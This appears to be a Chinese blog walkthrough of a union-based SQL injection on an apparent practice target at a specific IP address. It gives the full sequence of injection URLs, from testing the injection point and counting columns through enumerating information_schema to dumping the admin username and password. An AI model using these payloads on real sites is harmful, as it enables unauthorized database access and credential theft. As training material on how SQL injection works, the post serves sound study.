第一步:测试是否存在注入点,用and语句测试。
- http://120.203.13.75:6815/?id=1 and 1=1
- http://120.203.13.75:6815/?id=1 and 1=2
一网址可以正常显示,二网址则无法显示,所以推断有注入点。
第二步:猜测字段
http://120.203.13.75:6815/?id=1 order by 2
http://120.203.13.75:6815/?id=1 order by 3
order by 2可以正常显示,order by 3显示不出来,所以该表存在2个字段。
第三步:找到页面中数据输入点。
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,2
显示2,说明2这个位置是输出点。
第四步:查看版本和当前数据库
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,version()
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,database()
第五步:通过数据库版本,查看目录表
1.查看所有表名:
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
2.查看字段名字
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.columns where table_schema=database()
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()
然后知道了username和password在admin中
第六步:查找密码
http://120.203.13.75:6815/?id=1 and 1=2 union select 1,concat(id,'.',username,'.',password) from admin
用户名:admin
密码:hellohack
扫一扫
1458
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
